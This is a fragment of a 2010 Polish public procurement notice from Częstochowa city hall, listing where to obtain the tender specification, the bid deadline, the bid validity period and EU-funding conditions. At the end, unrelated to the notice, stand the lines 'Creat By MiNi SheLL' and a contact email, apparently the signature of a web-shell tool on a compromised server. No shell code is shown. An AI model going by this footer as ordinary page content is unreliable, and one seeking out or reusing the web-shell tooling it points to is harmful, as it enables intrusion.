<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://czestochowa.bip-gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Adres e-mail: jmusial@czestochowa.um.gov.pl oraz Urząd Miasta Częstochowy, Wydział Inwestycji i Zamówień Publicznych, pokój nr 417, ul. Śląska 11/13, 42-217 Częstochowa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2010 godzina 10:30, miejsce: Urząd Miasta Częstochowy Biuro Obsługi Interesanta (parter), stanowisko nr 7, ul. Śląska 11/13, 42-217 Częstochowa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Specyfikacja istotnych warunków zamówienia będzie dostępna na stronie internetowej Zamawiającego: http://czestochowa.bip-gov.pl
Na tej stronie Zamawiający będzie również zamieszczał pytania i odpowiedzi, modyfikacje SIWZ, odwołania dot. treści ogłoszenia oraz postanowień specyfikacji istotnych warunków zamówienia, ogłoszenie o wyborze najkorzystniejszej oferty..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com